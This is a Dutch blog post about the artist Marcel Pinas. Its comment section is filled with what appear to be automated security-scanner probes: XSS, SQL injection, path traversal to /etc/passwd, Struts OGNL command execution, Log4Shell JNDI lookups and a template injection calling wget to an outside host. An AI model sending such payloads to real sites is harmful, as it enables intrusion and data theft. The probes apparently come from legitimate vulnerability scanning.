30 okt 2019

Veel, heel veel publiciteit radio/TV en vele artikelen die al zijn en nog gepubliceerd gaan worden. Marcel Pinas hij heeft de publiciteit nodig om zijn doel te bereiken. De aanhouder wint.

door robbert rommy | geplaatst in: Geen categorie | 231

http://www.dwtonline.com/laatste-nieuws/2019/09/26/column-kunst-van-waarderen/

http://www.starnieuws.com/index.php/welcome/index/nieuwsitem/54827

0 Shares

231 Responses

Veiligheidsscan ForusP

26 mei 2023 | Beantwoorden

1
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

“‘>
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

‘ onEvent=X2944413264Y2_2Z
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

javascript:qxss(X2944413264Y2_2Z);
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1″‘>
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

_q=random(X2944413264Y2_2Z)
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1 _q_q=random(K9n1Mj5H)
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

” SRC=//localhost/j6SHtfJRk>
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

“‘><qssSIJBeZ4y=7;//<
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1″>
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

” onEvent=X2944413264Y2_2Z
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

%3cscript z%3e_q(y)%3c/script%3e
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

q
Qualys_resp_hdr_injection: Vulnerable
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

#
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

/*
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

,
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1e309
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

//….//….//….//….//….//….//….//etc/passwd
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

php://filter/read=string.rot13/resource=/etc/passwd
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

%25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

|netstat -an
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

“;(function(){qxss7ahv0Y8i});/**/”
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

qualys(aqxssvCg13NpI)xyz
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

9;(function(){qxssj6nONlFl});//
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

9
;(function(){qxss8j55E5iE});//
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

*/;(function(){qxss2u71CsYP});/*
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

“-qxssPT06HXuG()-“
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
/*

#set($value=23.0231*213.759)
$value
*/
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

(23.0231*213.759)
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

<!–#config timefmt="” –>qualyswas:
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

http://169.254.169.254/latest/meta-data/
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

http://22b9125ccdeae3ee25c69d8bf10b7d8ab2309b78.1634765810231792.2401144151.ssrf01.ssrf.eu1.qualysperiscope.com.
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

${jndi:ldap://461c04b4d8f4690329a4d839073df8e7771517ac.1634765810231792.1902189974.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://953bfb5fa0ae6bbfe591cdb13917cfaedc3d202a.1634765810231792.4013973936.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

${j${::-n}di:ldap${::-:}//8c7048cb1d7d3dab810c29d9ae1aeeb42af69b54.1634765810231792.1727386924.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//7ce7202496787196a5fc04ff8e1713fe6c9c24a2.1634765810231792.1776862305.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//8026959e8c9aee034d7e71a6ab7cfc95e98f9105.1634765810231792.2488950886.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://72c48c524aac1827caa82ff645a3406473060f09.1634765810231792.518250062.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′) or 2634=2634 —
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′ or 3789=3789 —
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1 or 4325=4325 —
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1 or NULL IS NULL
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1 and NULL IS NULL
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′) or ‘swqtp’=’swqtp
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′ or ‘tpklq’=’tpklq
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

11 or 11=11
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′ or true() or ‘and’ = ‘and
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1 or true() or ‘and’ = ‘and’
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1″ or true() or “and” = “and
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

aaaa&ping -n 92 localhost&
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

ping -c2 -i91 localhost
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

|ping -c2 -i91 localhost
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1WAITFOR DELAY ’00:00:29′
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1;WAITFOR DELAY ’00:00:29′;
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1);WAITFOR DELAY ’00:00:29′–
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′);WAITFOR DELAY ’00:00:29′–
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′,0,0);WAITFOR DELAY’00:00:29′–
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1;SELECT sleep(29); —
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′; var djci=sleep(29*1000);//
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′; var djci=sleep(29*1000) + ‘
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1′ + sleep(29*100*Math.sqrt(100)) + ‘
Veiligheidsscan ForusP

27 mei 2023 | Beantwoorden

1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
Veiligheidsscan ForusP

29 mei 2023 | Beantwoorden

${jndi:ldap://5f8a9f657a07d970b6dbd3eb17f27e0422a134ce.1636475110231792.2778060603.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

29 mei 2023 | Beantwoorden

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://dd45fa0b3c726fd86720c01ec94aaf4e7c874078.1636475110231792.2137006354.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

29 mei 2023 | Beantwoorden

${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//1256737650dc99b2927a34d7c7256e64192d152f.1636475110231792.2852720337.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

30 mei 2023 | Beantwoorden

${jndi:ldap://d6ca5460da0a41d28c5407f82068cd3cd90dcdfb.1636342510231792.3065817658.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

30 mei 2023 | Beantwoorden

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://65b2587f0c0a906d4dae45272346d9c90e0a3a7f.1636342510231792.1771851914.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

30 mei 2023 | Beantwoorden

${j${::-n}di:ldap${::-:}//8c257467ad7b3a5bad39a178fa37be95bcbe1349.1636342510231792.1783544005.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

30 mei 2023 | Beantwoorden

${jndi:dns://687accb93aba030c35dda5cda04c8f9ce5239a56.1636342510231792.3032302317.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

30 mei 2023 | Beantwoorden

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://81879097ee66c36658584e6221e8480d59309994.1636342510231792.1316309333.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

31 mei 2023 | Beantwoorden

${jndi:ldap://70eca1734517d7c0e07198db265de32b526ad484.1637118210231792.2161254033.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

31 mei 2023 | Beantwoorden

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://55200f45acada3488e1e39ae81cc026cd1845e8d.1637118210231792.1978598297.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

31 mei 2023 | Beantwoorden

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://c147055f60df36755b450e39dfcb241ea7117447.1637118210231792.233373713.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

31 mei 2023 | Beantwoorden

${jndi:ldap://3ee4e62f45e7473f5b06373dc6ebb7c1ef082656.1637118610231792.994553586.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

12 juni 2023 | Beantwoorden

${jndi:ldap://dc870c2152a2f5a38e9efc462b78315d98dfb754.1644309110231792.472129726.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

12 juni 2023 | Beantwoorden

${jndi:dns://315c87be826baa4cb81da118eb7d5ed3d60cdfab.1644309110231792.4123806609.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

_q=random(X149364044Y2_2Z)
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

‘ onEvent=X149364044Y2_2Z
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

” onEvent=X149364044Y2_2Z
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

javascript:qxss(X149364044Y2_2Z);
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

“>
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

z–>
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

1 _q_q=random(SqkDumMv)
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

” SRC=//localhost/j1nPO24yK>
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

“‘><qss9EQ3x7D3=7;//<
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

BODY{background:url(“javascript:qsscB3hgwtt=7”)}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

qssqK4a4G33=7
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

<script src=http://localhost/j
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

q
Qualys_resp_hdr_injection: Vulnerable
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

qualyswasesi
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

;–
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

“
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

(
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

….//….//….//….//….//….//etc/passwd
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

a(){}phpinfo(); function a
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

http://rfitest/
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

“;(function(){qxss6QzpNrEP});/**/”
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

“);(function(){qxssnRrIM512});/**/”
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

qualys(aqxsskhm2FJvQ)xyz
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

‘;(function(){qxss1Mp92x5x});/**/’
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

9;(function(){qxssLsV7rt6F});//
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

9
;(function(){qxssl368yK6v});//
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

*/;(function(){qxssP4o51LjN});/*
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

‘-qxssx0Z7h800()-‘
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

“-qxss76HdXSzj()-“
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

function(){qxssuX9GNhsI};
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

Joe+
bcc:was_engine@ab099a9d00dbea5481d3816c6b5bf15b709efea4.1647394710231792.929233607.smtphi01.smtp.eu1.qualysperiscope.com.
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

http://3721b8fb5161fc5d99794277ecc5effa94ed9a19.1647394710231792.732776998.ssrf01.ssrf.eu1.qualysperiscope.com.
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

ping -c 2 38965d95b1b4deae9ff7153cd2e4b86f8dfd8ba7.1647394710231792.4179424901.oscomm01.oscomm.eu1.qualysperiscope.com.
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

${jndi:ldap://1bec869fc1c87e2e9506f39f88ae1c59d5e8bdc8.1647394710231792.3589206250.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

${jndi:rmi://d9c9a9d096d01a8d8225b2a7ee0ceb995882e8cc.1647394710231792.200049609.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://81798af5aa24d2f41e053fb3f951dbb702c8ae20.1647394710231792.1072747213.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://df1165089b3360abb45c1816a163ca02fb350516.1647394710231792.3525915384.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

${j${::-n}di:ldap${::-:}//98de0d59b8b696c0888c065dd7e9d2ba00d3ad17.1647394710231792.3479971217.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

${jnd${123%ff:-${123%ff:-i:}}ldap://163dab7bd174546bdebaea2a84d8c381e08a36ae.1647394710231792.3933946296.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//7acc1e4ea8938745ce1775a596d4acf74509a98c.1647394710231792.4221832301.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

${jndi:dns://5552dcb0f7650dd778908e00061e50650b2d336e.1647394710231792.3566758011.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//c167f27e6c3a2b20708e06cbb8de937888d9ea9c.1647394710231792.4292510324.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://383e96009912841815fee362af52d09076c37eb1.1647394710231792.3674592551.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://e87145ace756619e110fb82905772702a952df9f.1647394710231792.3746020778.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://f078b89543f6b2284d47e48176ee9cd9ad0942e1.1647394710231792.2566342378.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}
Veiligheidsscan ForusP

14 juni 2023 | Beantwoorden

1′) and 2634=1123 —
1

7 december 2023 | Beantwoorden

1
1

8 december 2023 | Beantwoorden

“‘>
1

8 december 2023 | Beantwoorden

‘ onEvent=X140021438507792Y2_2Z
1

8 december 2023 | Beantwoorden

” onEvent=X140021438507792Y2_2Z
1

8 december 2023 | Beantwoorden

“>
1

8 december 2023 | Beantwoorden

1″‘>
1

8 december 2023 | Beantwoorden

z–>
"'>

8 december 2023 | Beantwoorden

1
' onEvent=X140021438507792Y3_2Z

8 december 2023 | Beantwoorden

1
" onEvent=X140021438507792Y3_2Z

8 december 2023 | Beantwoorden

1
1

8 december 2023 | Beantwoorden

qss9pZSkwI7=7
1

8 december 2023 | Beantwoorden

%3cscript z%3e_q(y)%3c/script%3e
1

8 december 2023 | Beantwoorden

qss{{q=(2*2.0)}}qss
1

8 december 2023 | Beantwoorden

{{333*334}}
1

8 december 2023 | Beantwoorden

q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
1

8 december 2023 | Beantwoorden

q
Qualys_resp_hdr_injection: Vulnerable
1

8 december 2023 | Beantwoorden

q
Qualys_resp_hdr_injection: Vulnerable
1

8 december 2023 | Beantwoorden

qualyswasesi
1

8 december 2023 | Beantwoorden

1′
1

8 december 2023 | Beantwoorden

;–
1

8 december 2023 | Beantwoorden

#
1

8 december 2023 | Beantwoorden

/*
1

8 december 2023 | Beantwoorden

“
1

8 december 2023 | Beantwoorden

,
1

8 december 2023 | Beantwoorden

(
1

8 december 2023 | Beantwoorden

1e309
1

8 december 2023 | Beantwoorden

//….//….//….//….//….//….//….//etc/passwd
1

8 december 2023 | Beantwoorden

php://filter/read=string.rot13/resource=/etc/passwd
1

8 december 2023 | Beantwoorden

….//….//….//….//….//….//etc/passwd
1

8 december 2023 | Beantwoorden

%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1

8 december 2023 | Beantwoorden

%25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1

8 december 2023 | Beantwoorden

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1

8 december 2023 | Beantwoorden

a(){}phpinfo(); function a
1

8 december 2023 | Beantwoorden

|netstat -an
1

8 december 2023 | Beantwoorden

http://rfitest/
1

8 december 2023 | Beantwoorden

“;(function(){qxssGwIVq7op});/**/”
1

8 december 2023 | Beantwoorden

“);(function(){qxss0cEdlW0T});/**/”
1

8 december 2023 | Beantwoorden

qualys(aqxssf4kd8532)xyz
1

8 december 2023 | Beantwoorden

‘;(function(){qxss39hiH3h9});/**/’
1

8 december 2023 | Beantwoorden

9;(function(){qxssSZ7RRKrA});//
1

8 december 2023 | Beantwoorden

9
;(function(){qxssD58IE96t});//
1

8 december 2023 | Beantwoorden

*/;(function(){qxss1q6g56UB});/*
1

8 december 2023 | Beantwoorden

‘-qxss617SP9Cb()-‘
1

8 december 2023 | Beantwoorden

“-qxssVj9h9rnq()-“
1

8 december 2023 | Beantwoorden

1!@#$%^&*()
1

8 december 2023 | Beantwoorden

!@#$%^&*()1
1

8 december 2023 | Beantwoorden

!@#$%^&*()
1

8 december 2023 | Beantwoorden

|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1

8 december 2023 | Beantwoorden

{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1

8 december 2023 | Beantwoorden

;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
/*

#set($value=23.0231*213.759)
$value
*/
1

8 december 2023 | Beantwoorden

(23.0231*213.759)
1

8 december 2023 | Beantwoorden

<!–#config timefmt="” –>qualyswas:
1

8 december 2023 | Beantwoorden

http://169.254.169.254/latest/meta-data/
1

8 december 2023 | Beantwoorden

Joe+
bcc:was_engine@94946638f23bbd51f09c1c98feae1f316e048dbd.1768425210231792.741032307.smtphi01.smtp.eu1.qualysperiscope.com.
1

8 december 2023 | Beantwoorden

http://952110adb1c446346c56d5a048328fbf1703d548.1768425210231792.3548704588.ssrf01.ssrf.eu1.qualysperiscope.com.
1

8 december 2023 | Beantwoorden

1ee1d132944de689c2e8e6373940fad9673155fa.1768425210231792.3832881590.ssrf02.ssrf.eu1.qualysperiscope.com.
1

8 december 2023 | Beantwoorden

${jndi:ldap://748d2637f9307c3279ffa82f5e6a81fb66468f49.1768425210231792.3605174985.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
1

8 december 2023 | Beantwoorden

${jndi:rmi://b4066dcb3b35e3b721d36726ed1c0f06b871968f.1768425210231792.959930066.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
1

8 december 2023 | Beantwoorden

